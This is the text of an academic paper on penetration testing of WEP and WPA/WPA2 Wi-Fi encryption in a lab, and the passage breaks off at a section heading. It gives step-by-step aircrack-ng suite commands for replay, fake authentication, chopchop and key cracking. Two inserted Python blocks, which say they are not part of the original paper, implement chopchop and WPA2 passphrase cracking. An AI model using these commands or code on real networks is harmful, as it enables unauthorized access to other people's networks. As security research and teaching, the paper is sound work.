
Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux Hacking Tools
Article in International Journal of Computer Applications, June 2020. DOI: 10.5120/ijca2020920365
Authors: Michael Kyei Kissi (University of Media, Arts and Communication (UniMAC)); Michael Asante (Kwame Nkrumah University of Science and Technology)
ResearchGate: https://www.researchgate.net/publication/342283555 (content uploaded by Michael Kyei Kissi on 10 July 2020)


International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux Hacking Tools

Michael Kyei Kissi, Department of Computer Science, Kwame Nkrumah University of Science and Technology, Kumasi, Ghana
Michael Asante, PhD, Department of Computer Science, Kwame Nkrumah University of Science and Technology, Kumasi, Ghana

ABSTRACT
The use of wireless networks as a medium of communication has increased tremendously because of their flexibility, mobility and easy accessibility. Their use is now taken for granted at hotels and restaurants, airports and organizations, and is predominant in homes. As large numbers of devices connect to wireless networks, valuable and sensitive information is shared among users over the open air, and attackers can easily sniff and capture data packets. This paper uses penetration testing to assess vulnerabilities in, and conduct attacks on, the Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) and 802.11i (WPA2) security protocols. The penetration testing was conducted using Kali Linux and its Aircrack-ng tools.

Keywords
IEEE, 802.11, WEP, WPA, WPA2, Kali Linux, Aircrack-ng, WLAN, Wireless, Penetration Testing, Encryption, Security.

1. INTRODUCTION
Wireless networking in today's communication technology is growing tremendously because of the benefits it provides, such as flexibility, mobility and easier accessibility. Most hotels and restaurants, coffee shops, airports, organizations and institutions currently provide open or secured wireless connectivity, and wireless networks are found in homes as well [1]. The IEEE 802.11 Wireless Local Area Network (WLAN) has become the easiest and best-known network technology to set up since its inception. Its popularity results from its use as a Local Area Network (LAN), its lower cost, and its easy installation and configuration procedures [2]. The availability of WLAN threatens the security of the network infrastructure and creates challenges for network administrators as well as the organization: a WLAN signal travels beyond the boundaries of a specified area, unlike a wired network [3]. [4] noted that the wireless medium is shared among its users over the open air, so attackers can easily sniff and capture data packets. A WLAN may suffer attacks and damage such as system compromise, data theft and Denial of Service (DoS), among others [5]. This study presents a security assessment of WLAN using penetration testing tools to examine and exploit identified vulnerabilities in WLAN security protocols. The penetration testing framework used was based on the NIST Technical Guide to Information Security Testing and Assessment [6], which involves four phases: the Planning Phase, Discovery Phase, Attack Phase and Reporting Phase.

2. LITERATURE REVIEW
The IEEE 802.11 standard specifies WLAN communication among devices [7]. The IEEE developed 802.11 in 1997 as a member of the 802 family of standards: 802 covers Local and Metropolitan Area Networks (LAN/MAN), while the suffix .11 denotes the WLAN [3]. 802.11 is governed by a set of rules, or protocols, that regulate the propagation of wireless signals and communication across the wireless network; its Medium Access Control (MAC) protocol is Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA). Versions of the standard are recognized by one or two trailing letters: 802.11a, 802.11b, 802.11g, 802.11n and 802.11ac [8]. The most common and widely used are 802.11a, 802.11b and 802.11g [7].

2.1 Attacks on WLAN
A WLAN uses Radio Frequency (RF) or infrared transmission for connectivity among devices, which makes it susceptible to attack. Attacks on a wireless network aim at breaching the confidentiality, integrity and availability of the network and of the information it carries. These attacks are categorized as passive and active attacks.

Passive attack: network traffic is silently eavesdropped on or monitored by an attacker, who waits until a client seeks to connect to the Access Point (AP) or probes for the network Service Set Identifier (SSID); the attacker thereby obtains the SSID in plaintext. Passive techniques used against data transmitted through the network include traffic analysis, packet sniffing, war-driving and port scanning. These attacks are usually difficult to detect, since the attacker does not modify any content [9].

Active attack: the attacker not only gains access to information but can change it and even inject fraudulent packets into the network. An attacker can disrupt the usual operation of the network with Denial of Service (DoS), session hijacking, brute-force attacks, replay attacks and Man-in-the-Middle (MITM) attacks [9][10].

2.2 WLAN Security
The WLAN security protocols defined by the IEEE and the Wi-Fi Alliance comprise three standards: Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access 2 (WPA2) [11]. [12] stated that WLAN security protocols were designed to protect the network from breaches made possible by the Wi-Fi transmission signal, which has no fixed boundary and is therefore exposed to illegitimate access. According to [13], a secured WLAN must meet five key requirements: authentication, access control, confidentiality, non-repudiation and data integrity. In spite of this, WLAN security is prone to threats such as eavesdropping and traffic analysis, Denial of Service, masquerade, forged packets and

among others.

2.3 Wired Equivalent Privacy (WEP)
IEEE 802.11 introduced WEP in 1999 to give wireless networks security comparable to that of wired ones [3]. WEP encryption is based on the RC4 symmetric stream cipher with 40-bit or 104-bit keys [7]. WEP involves two parameters: an Initialization Vector (IV), a 3-byte (24-bit) value, and the shared WEP key, entered as hexadecimal digits, which is used for both encryption and decryption. WEP appends a 32-bit Cyclic Redundancy Check (CRC-32) checksum, the Integrity Check Value (ICV), to each transmitted data frame. The 24-bit IV, chosen per frame, is concatenated with the secret key and fed to RC4 to produce a keystream; the plaintext (with its ICV) is XORed with the RC4 keystream to create the ciphertext, as illustrated in figure 1.

Figure 1: WEP Data Frame Encryption [14]

According to [15], WEP decrypts a received data frame by regenerating the keystream with RC4 (from the IV and shared key) and XORing it with the ciphertext to retrieve the plaintext. A new checksum is computed and compared with the received checksum; the plaintext is accepted if the two checksums are equal, as shown in figure 2.

Figure 2: WEP Data Frame Decryption [14]

2.3.1 Weakness and Vulnerabilities in WEP
WEP uses the RC4 algorithm and a secret key to provide access control and confidentiality, and the CRC checksum for data integrity [15]. Despite these security controls, the WEP protocol has vulnerabilities that attackers can exploit.

2.3.1.1 Short IV Size and Keystream Reuse
The IV is 24 bits long, giving 16,777,216 (2^24) different RC4 keystreams for a given WEP key, and is transmitted in clear text with each packet [16]. The IV is what varies the keystream: when the IV changes, so does the keystream. As more traffic is sent, unique IVs can no longer be generated after 2^24 packets, so IVs repeat (are reused) once the 24-bit space is exhausted, and two frames encrypted under the same IV share the same keystream.

2.3.1.2 Integrity Check Value (ICV) Insecurity
The purpose of the ICV, or CRC checksum, is to safeguard packets in transit by preventing attackers from altering them [17]. The CRC is a linear function, however, which means an attacker can modify an encrypted message and fix up the ICV so that the result still passes as a genuine message. An attacker with a valid keystream can create arbitrary messages, compute their checksums and encrypt them with the keystream, since WEP allows the IV (and hence the keystream) to be reused [18].

2.3.1.3 No Mutual Authentication
WEP authentication is client-centred, or one-way: the AP authenticates the client, but the AP never proves its own identity to the client, since the shared WEP key is only ever checked by the AP [19]. A client therefore cannot tell a legitimate AP from a rogue one.

2.3.1.4 Forged Authentication Messages
An attacker eavesdrops on and monitors the transmitted packets in order to recover an RC4 keystream [20]. Because the shared-key authentication challenge is encrypted with the same kind of keystream, the recovered stream can be used to encrypt any challenge received, so the attacker can forge a valid authentication response out of the keystream without knowing the key.

2.3.2 Attacks on WEP

2.3.2.1 Chopchop Attack
The chopchop attack decrypts a WEP packet without knowing the WEP key. An attacker recovers the last n bytes of plaintext of an encrypted packet by sending an average of n*128 packets to the network [21]: the last byte is chopped off, the ICV is corrected for each of the 256 possible values of the removed byte, and the AP relays only the correctly corrected packet. The attack exploits the 4-byte CRC checksum used for the integrity of encrypted packets, which is linear and unkeyed [22].

2.3.2.2 Fluhrer, Mantin and Shamir (FMS) Attack
The FMS attack is a statistical attack discovered by Fluhrer, Mantin and Shamir. It results from the use of weak Initialization Vectors (IVs) with the RC4 algorithm [23]. [24] describes the "weak" IVs as having the form (B+3, 255, X), where B is the index of the key byte being attacked, 255 (0xff) is a constant, and X is arbitrary. The attacker can determine the value of key byte B using the known plaintext found in the headers of certain packets, such as Address Resolution Protocol (ARP) packets [25].

2.3.2.3 ARP Replay Attack
IVs are freely reused and there is no sequence number with which replayed packets could be rejected, which lets an attacker generate more packets from captured ones [26]. ARP request packets are easily identified by their broadcast destination MAC address and fixed size. The attacker sniffs an ARP request from a legitimate host and replays it continuously; the host answers each replay with an ARP response, so more traffic is generated, each frame carrying a new IV. When enough data packets with weak IVs have been collected, the WEP key is cracked within a short period.

2.4 Wi-Fi Protected Access (WPA)
The Wi-Fi Alliance created WPA in 2003 to address the vulnerabilities and flaws in WEP [20]. WPA improves data encryption with the Temporal Key Integrity Protocol (TKIP), which mixes a fresh key for every packet and adds an integrity check to prevent tampering [20]. TKIP uses the same RC4 cipher as WEP, but uses a key-mixing function to derive a unique per-packet key for each frame transmitted. TKIP uses a Message Integrity Code (MIC) for its integrity check instead of the ICV used by WEP, which prevents attackers from modifying a packet to recover the keystream used to encrypt it [27]. It also uses a sequence counter to prevent replay attacks, further improving the integrity check.

2.5 Wi-Fi Protected Access 2 (WPA2)
The Wi-Fi Alliance improved on WPA in 2004 with 802.11i (WPA2), which uses the concept of a Robust Security Network (RSN) [20][10]. It tackles three key security areas: data transfer privacy, authentication and key management [28]. WPA2 uses the Advanced Encryption Standard (AES) in the Counter Mode with Cipher Block Chaining

Message Authentication Code (CBC-MAC) Protocol (CCMP) for data encryption [29][30]. CCMP was created as part of 802.11i (WPA2) to replace WEP and TKIP [10]. AES is the Rijndael block cipher with 128-bit, 192-bit or 256-bit keys; CCMP uses 128-bit keys. AES/CCMP uses a single temporal key for all packets, which removes the per-packet key scheduling and key distribution problems of WEP and TKIP [31].

2.5.1 WPA/WPA2-PSK Four-Way Handshake
WPA/WPA2-PSK derives a Pairwise Master Key (PMK) from the passphrase and, from the PMK, fresh per-session keys. According to [32], the four-way handshake provides mutual authentication based on the PMK, in that each side proves possession of it, and agrees on a fresh session key known as the Pairwise Transient Key (PTK). The four-way handshake consists of an exchange of four packets (messages) between the client (Supplicant) and the AP (Authenticator). The PMK is generated with the key derivation function PBKDF2, which requires these inputs:

PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)

where:
Passphrase: the passphrase (8 to 63 characters)
SSID: the SSID of the Authenticator (AP)
SSIDlen: the length of the SSID
4096: the number of hashing iterations (HMAC-SHA1)
256: the intended key length of the PSK, in bits

The PTK is the dynamic key that the four-way handshake establishes during authentication. The PMK and the two nonces are used to create the PTK when a connection is made [33]:

PTK = Function(PMK, Authenticator Nonce (ANonce), Supplicant Nonce (SNonce), Authenticator MAC, Supplicant MAC)

where Function is the 802.11i pseudo-random function and

PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)

so that

PTK = Function(PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256), ANonce, SNonce, Authenticator MAC, Supplicant MAC)

The messages exchanged in the four-way handshake are Extensible Authentication Protocol over LAN (EAPOL) frames. The EAPOL-Key frames of the four-way handshake serve key exchange and negotiation [34]. The four-way handshake between the supplicant and the authenticator starts once both sides hold the PMK. Figure 3 illustrates the four-way handshake and the installation of the PTK.

1. Authenticator to Supplicant
The Authenticator (AP) generates a long random value, the Authenticator Nonce (ANonce), and sends it to the supplicant in plaintext; the supplicant can now generate the PTK.

2. Supplicant to Authenticator
The supplicant replies by generating its own long random value, the Supplicant Nonce (SNonce). The supplicant derives the PTK from the PMK, the ANonce and the SNonce (together with the two MAC addresses) and attaches a MIC, computed with the cryptographic hash HMAC-SHA1 under the key confirmation part of the PTK, so that the AP can check that the supplicant holds the same key.

3. Authenticator to Supplicant
When the AP receives the second message it reads the SNonce and the MIC, derives its own PTK from the same inputs and uses that PTK to verify the received MIC. If the MIC is valid the AP installs the PTK and sends the third message, which carries the Group Temporal Key (GTK) encrypted under the PTK and is again protected by a MIC.

4. Supplicant to Authenticator
The supplicant verifies the MIC of the third message, which confirms that both sides derived the same PTK, and acknowledges it. The supplicant installs the PTK for encrypted unicast transmission and the GTK for broadcast and multicast transmission.

Figure 3: Generation of WPA/WPA2 Four-way Handshake [33]

2.5.2 Weakness and Vulnerabilities in WPA/WPA2
All the values needed to compute the PTK from the PMK are transmitted unencrypted in the four-way handshake. The PTK is a temporary key, used so that the PMK itself never has to be sent. The weakness of WPA-PSK stems from how the PMK is derived [14]: PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256). The attacker runs the PBKDF2 algorithm with the captured SSID and SSID length and a candidate passphrase of their own choosing to compute a candidate PMK, derives the PTK from it together with the captured addresses and nonces, recomputes the MIC and compares it with the MIC captured in the handshake. If the two values match, the candidate is the valid passphrase. The client and AP MAC addresses, the ANonce, the SNonce and the MIC are all transmitted in clear text and, together with the PMK, determine the PTK. An attacker can therefore use brute-force and dictionary attacks to discover the WPA key [10][14][35]; if the passphrase exists in the attacker's dictionary or wordlist, the WPA key will be cracked.

2.5.3 Attack on WPA/WPA2
WPA/WPA2 is vulnerable to attacks against the four-way handshake and the encryption protocol [36]. PTK generation is based on the PMK, the Authenticator MAC, the Supplicant MAC and the two nonces. With the exception of the PMK, all of these parameters are transmitted in plaintext during the four-way handshake. The only value unknown to an attacker computing the PMK is the passphrase (PSK), which can be guessed by a dictionary attack against a captured, valid four-way handshake. The passphrase will be found if it exists in the dictionary or wordlist [14][37].

3. METHODOLOGY
The environment chosen for the assessment and penetration testing was a WLAN infrastructure set up as an experimental network laboratory. The study chose to use

the network laboratory so as not to compromise any individual's or organization's network, for reasons of privacy and the legality of handling user information.

3.1 Laboratory Experiment Setup and Requirements
The experiment required an Authenticator (wireless router), an external wireless adapter and two laptops, one as the pentester PC and the other as the supplicant (the supplicant could be any device with wireless connectivity). Figure 4 illustrates the connections between the devices used.

Figure 4: Setup for Penetration Testing

3.2 Exploiting Vulnerabilities in IEEE 802.11 WEP Security Protocol
Three vulnerabilities were discovered and exploited in the IEEE 802.11 WEP security protocol through the penetration testing conducted.

3.2.1 No Replay Protection Mechanism in WEP
Captured packets were repeatedly replayed into the network to make the AP generate more packets, and hence more IVs, including the weak IVs the key-recovery attack needs. IVs are reused because the IV space is short and is quickly exhausted. The following steps indicate how the vulnerability was exploited.

The command "airodump-ng wlan0mon" was used to discover the wireless network and to sniff and capture data packets. wlan0mon is the monitor-mode interface of the attacker's wireless card; the targeted AP has the MAC address (BSSID) 98:FC:11:EE:41:25. Sniffed and captured data packets were saved to a file called arp-test using the command "airodump-ng --channel 6 --bssid 98:FC:11:EE:41:25 --write arp-test wlan0mon", as shown in figure 5.

Figure 5: Capture of Data Packets on Targeted Access Point

The command "aireplay-ng --arpreplay -e SecurityTest wlan0mon" was used to detect ARP request packets to replay, so that the AP would send ARP response packets and the attacker could generate more packets. Figure 6 shows that data packets (59 packets) were received but no ARP request packet was detected, because the replayed frames carried the attacker's own MAC address (00:C0:CA:83:01:CD), which the AP did not accept.

Figure 6: Detection of ARP Request Packets

To avoid being rejected by the AP, the attacker then used the MAC address of an associated client (AC:36:13:6C:6F:4A) and repeatedly replayed the captured ARP request packets, receiving ARP responses and thereby generating more packets with weak IVs, using the command "aireplay-ng --arpreplay -e SecurityTest -h AC:36:13:6C:6F:4A wlan0mon". The attacker successfully generated 70593 more packets, as shown in figure 7.

Figure 7: Successful Generation of ARP Packets by Attacker

3.2.2 No Mutual Authentication makes it Vulnerable to Fake Authentication Attack
A fake authentication was conducted and the attacker was successfully associated with the AP as a result of the absence of mutual authentication. The experiment steps were as follows:

The attacker used the command "aireplay-ng --fakeauth 0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon" to conduct a fake authentication using its own MAC address (00:C0:CA:83:01:CD) against the AP MAC address (98:FC:11:EE:41:25), since the AP only authenticates its clients and never has to prove itself. Figure 8 shows that the authentication request and association request were acknowledged by the AP, meaning the attacker was connected to the AP.

Figure 8: Successful Fake Authentication and Association with Target AP by Attacker

3.2.3 WEP is Vulnerable to Message Modification and Injection Due to ICV Insecurity
The WEP security protocol could not detect modified packets or differentiate between original and forged packets. The following steps demonstrate the vulnerability:

The attacker used the command "aireplay-ng --chopchop -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon" to decrypt a captured encrypted data packet, obtaining its keystream (replay_dec-0713-213506.xor) and plaintext (replay_dec-0713-213506.cap), as shown in figure 9.
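The WEP construction of figures 1 and 2, the CRC-32 linearity of section 2.3.1.2 and the chopchop attack of sections 2.3.2.1 and 3.2.3, as an added worked example in Python. It is not part of the original paper and is not aircrack-ng's code: it models WEP encryption and decryption (RC4 over IV || key, CRC-32 ICV appended least-significant byte first), forges a bit-flipped frame with a corrected ICV without knowing the key, and then runs chopchop against a simulated AP that acts as an ICV oracle, recovering keystream bytes from the end of a frame one byte at a time. The key, IV and frame contents are constructed values, and the wep_decrypt oracle stands in for the AP relaying or dropping each injected frame.

```python
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA) of the given length."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, appended least-significant byte first."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Figure 1: (plaintext || ICV) XOR RC4(IV || key). The IV itself travels in the clear."""
    body = plaintext + icv(plaintext)
    return xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, iv: bytes, ciphertext: bytes):
    """Figure 2: regenerate the keystream, XOR, recompute the CRC. None when the ICV fails."""
    body = xor(ciphertext, rc4(iv + key, len(ciphertext)))
    plaintext, received = body[:-4], body[-4:]
    return plaintext if icv(plaintext) == received else None


def forge_bitflip(ciphertext: bytes, offset: int, delta: bytes) -> bytes:
    """2.3.1.2: XOR delta into the plaintext without the key. CRC-32 is affine over XOR,
    crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0...0), so the encrypted ICV can be patched too."""
    n = len(ciphertext) - 4
    patch = bytearray(n)
    patch[offset:offset + len(delta)] = delta
    icv_delta = zlib.crc32(bytes(patch)) ^ zlib.crc32(bytes(n))
    return xor(ciphertext, bytes(patch) + icv_delta.to_bytes(4, "little"))


# The CRC-32 lookup table zlib uses (reflected polynomial 0xEDB88320); chopchop needs it.
CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)


def chop_mask(j: int) -> bytes:
    """Inverting one CRC step: if the dropped byte consumed table index j, the shortened frame's
    new ICV differs from the old (byte, ICV0, ICV1, ICV2) by exactly this key-independent mask."""
    t = CRC_TABLE[j]
    return bytes([j ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])


def chopchop(ciphertext: bytes, accepts, nbytes: int) -> bytes:
    """2.3.2.1: recover the last `nbytes` keystream bytes. `accepts(frame)` is the AP oracle
    (True when the AP relays the frame, i.e. its ICV verified). Average 128 guesses per byte."""
    keystream = bytearray()
    cur = ciphertext
    for _ in range(nbytes):
        for j in range(256):
            shorter = cur[:-1]
            candidate = shorter[:-4] + xor(shorter[-4:], chop_mask(j))
            if accepts(candidate):
                dropped_plain = (CRC_TABLE[j] >> 24) ^ 0xFF  # top byte of the old ICV
                keystream.insert(0, cur[-1] ^ dropped_plain)
                cur = candidate
                break
        else:
            raise RuntimeError("no guess accepted; oracle is not a WEP ICV check")
    return bytes(keystream)


def demo() -> bytes:
    """Constructed scenario: the attacker knows only the IV and ciphertext; the AP knows the key."""
    key = bytes.fromhex("0123456789ABCDEF0123456789")   # constructed 104-bit WEP key
    iv = b"\x01\x02\x03"
    frame = b"GET /login?user=alice HTTP/1.1"           # constructed plaintext
    c = wep_encrypt(key, iv, frame)
    assert wep_decrypt(key, iv, c) == frame
    forged = forge_bitflip(c, frame.index(b"alice"), xor(b"alice", b"bobby"))
    assert wep_decrypt(key, iv, forged) == b"GET /login?user=bobby HTTP/1.1"
    ap_oracle = lambda body: wep_decrypt(key, iv, body) is not None
    ks = chopchop(c, ap_oracle, 8)                        # last 8 keystream bytes
    return xor(c[-8:-4], ks[:4])                          # the last 4 plaintext bytes
```

Two caveats a practitioner should keep in mind. The oracle here answers instantly, whereas aireplay-ng --chopchop has to watch for the AP relaying each injected frame, which is why it needs the injecting MAC to be accepted by the AP (the fake authentication of section 3.2.2). And chop_mask is key-independent only because CRC-32 is affine; a keyed integrity code (TKIP's MIC, CCMP's CBC-MAC) removes exactly this property, which is why neither the bit-flip nor chopchop carries over to WPA/WPA2.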

Figure 9: Capture of Keystream and Plaintext files

The attacker then forged a new packet out of the keystream, with a correct checksum, using the command "packetforge-ng -0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0713-213506.xor -w packetforge-test" (an ARP request to the broadcast address, encrypted with the recovered keystream), and saved it to a file called packetforge-test.

The command "aireplay-ng -2 -r packetforge-test wlan0mon" was used to inject the forged packet into the network, making the AP generate data packets with new IVs, as shown in figure 10. These generated packets speed up the cracking of the WEP key.

Figure 10: Generation of New IVs from Forged Packets

3.2.4 Cracking of IEEE 802.11 WEP Encryption Protocol Key
Aircrack-ng was run in parallel as more packets with weak IVs were generated. With 51326 IVs, 698 possible keys were tested and the WEP key was successfully cracked, as shown in figure 11.

Figure 11: WEP Key Successfully Cracked

3.3 Exploiting Vulnerabilities in IEEE 802.11 WPA/WPA2-PSK Encryption Protocol
Three vulnerabilities associated with the security protocol were discovered:
1. The four-way handshake is transmitted unencrypted (plaintext).
2. The Message Integrity Check (MIC) is transmitted unencrypted (plaintext).
3. The derivation formulae for computing the PMK and PTK are known to the attacker.
The attacker requires the capture of a valid four-way handshake (which contains the MIC and the inputs needed to derive the PMK and PTK) and a wordlist to conduct a dictionary attack against the PSK (passphrase), the only value unknown to the attacker.

Figure 12 shows the successful capture of the four-way handshake, saved to a file called wpa-handshake using the command "airodump-ng --channel 6 --bssid 98:FC:11:EE:41:25 --write wpa-handshake wlan0mon".

Figure 12: Successful Capture of WPA Handshake

3.3.1 Cracking of WPA/WPA2-PSK Passphrase
With the captured WPA handshake and a wordlist (dictionary of passwords), aircrack-ng was used to crack the WPA passphrase using the command "aircrack-ng wpa-handshake-01.cap -w passwords". The passphrase (WPA key) was successfully cracked, as shown in figure 13.

Figure 13: WPA-PSK Key (Passphrase) Successfully Cracked

4. RESULTS ANALYSIS
The vulnerabilities discovered enabled the wireless security protocols to be cracked successfully.
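The PMK/PTK/MIC derivation of section 2.5.1 and the dictionary attack of sections 2.5.2, 2.5.3 and 3.3.1, as an added worked example in Python. It is not part of the original paper and is not aircrack-ng's code; it fills in the "Function" the paper leaves abstract with the 802.11i definitions: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits); PTK = PRF(PMK, "Pairwise key expansion", min/max of the two MAC addresses followed by min/max of the two nonces); KCK = first 128 bits of the PTK; Key MIC = HMAC-SHA1 over the EAPOL-Key frame with its MIC field zeroed, truncated to 128 bits (key descriptor version 2, as used by WPA2/CCMP). No real capture is embedded. build_capture synthesises message 2 of the handshake by running the legitimate supplicant computation with a known passphrase (the SSID and MAC addresses are those quoted in section 3; the nonces and the passphrase are constructed), and crack_psk then plays the attacker, who sees only the frame, the SSID, the MACs and the ANonce.

```python
import hashlib
import hmac

MIC_OFFSET = 81    # 4-byte 802.1X header + 77 EAPOL-Key descriptor bytes precede the Key MIC field
NONCE_OFFSET = 17  # 802.1X header + descriptor type (1) + key info (2) + key length (2) + replay ctr (8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256): HMAC-SHA1, 4096 rounds, 32-byte output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """The paper's Function(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC): PRF-384 for CCMP."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC = HMAC-SHA1(KCK, frame with the 16-byte MIC field zeroed)[:16] (descriptor version 2)."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Message 2 (supplicant -> AP) as a raw EAPOL-Key frame with the MIC filled in.
    Field layout per IEEE 802.11i; the RSN IE in Key Data is omitted in this constructed frame."""
    body = (b"\x02"                            # descriptor type: RSN
            + b"\x01\x0a"                      # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                      # key length 16 (CCMP)
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8)  # EAPOL-Key IV, RSC, reserved
            + bytes(16)                        # Key MIC placeholder, filled below
            + b"\x00\x00")                     # key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes, wordlist):
    """Sections 2.5.2 / 3.3.1: everything except the passphrase is in the clear, so for each
    candidate derive PMK -> PTK -> KCK, recompute the MIC and compare it with the captured one."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def build_capture(passphrase: str):
    """Synthesises what airodump-ng captured in section 3.3: the legitimate supplicant's message 2.
    SSID and MACs are the paper's lab values; the nonces are deterministic stand-ins for random ones."""
    ssid = "SecurityTest"
    aa = bytes.fromhex("98FC11EE4125")        # AP (authenticator) address
    spa = bytes.fromhex("AC36136C6F4A")       # client (supplicant) address
    anonce = hashlib.sha256(b"ANonce: constructed").digest()
    snonce = hashlib.sha256(b"SNonce: constructed").digest()
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return ssid, aa, spa, anonce, build_msg2(snonce, kck)


def known_vector_ok() -> bool:
    """IEEE 802.11i Annex H.4.3 test case: passphrase 'password', SSID 'IEEE'."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return pmk_from_passphrase("password", "IEEE").hex() == expected


def demo():
    ssid, aa, spa, anonce, msg2 = build_capture("s3cur1ty-test")   # constructed passphrase
    wordlist = ["password", "12345678", "SecurityTest", "s3cur1ty-test", "letmein1"]
    return crack_psk(ssid, aa, spa, anonce, msg2, wordlist)
```

This per-candidate derivation is what aircrack-ng repeats for every line of the wordlist in section 3.3.1, so cracking time is dominated by the 4096 PBKDF2 iterations per candidate, and success depends only on whether the passphrase is in the list. The min/max ordering of addresses and nonces makes the PTK the same whichever side's values are listed first. For WPA with TKIP (key descriptor version 1) the MIC is HMAC-MD5 and the PTK is 512 bits; the structure of the attack is unchanged.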

4.1 Analysis on Vulnerabilities in IEEE 802.11 WEP Encryption Protocol

4.1.1 No Replay Protection Mechanism in WEP
70593 packets were captured and repeatedly replayed into the network to generate more packets with weak IVs, which aided the cracking of the WEP key. The 18112 ARP packets used for the replay attack were successfully captured and injected into the network to generate packets, as shown in figure 14.

Figure 14: ARP Packets Generated by Attacker

4.1.2 No Mutual Authentication makes it Vulnerable to Fake Authentication Attack
The attacker successfully performed a fake authentication and was associated with the AP, gaining access to network resources. Figure 15 shows the AP's acknowledgement of a successful authentication and association, as highlighted.

Figure 15: Successful fake Authentication and Association with Target AP by Attacker

The attacker's MAC address (00:C0:CA:83:01:CD) appeared in the discovered list of clients connected to the AP with MAC address 98:FC:11:EE:41:25, as shown in figure 16.

Figure 16: Attacker Connects to Access Point

4.1.3 WEP is Vulnerable to Message Modification and Injection Due to ICV Insecurity
Using the chopchop attack, the attacker was able to decrypt encrypted packets without knowing the secret key. The attacker chops off the last byte of the captured encrypted packet, guesses the value of the removed byte, corrects the encrypted checksum accordingly and injects the shortened packet into the network; if the AP accepts (relays) the modified packet, the guess was correct, otherwise the AP silently drops it because its ICV is wrong. Because the CRC is linear, the correction can be computed without the key, so the AP acts as an oracle that validates the attacker's forged or modified packets. The decrypted packet's keystream (replay_dec-0713-213506.xor) and plaintext (replay_dec-0713-213506.cap) were saved to files, as shown in figure 17. The recovered keystream is then used to forge valid packets that the AP accepts.

Figure 17: Saved Plaintext and Keystream files

4.1.4 Cracking of IEEE 802.11 WEP Encryption Protocol Key
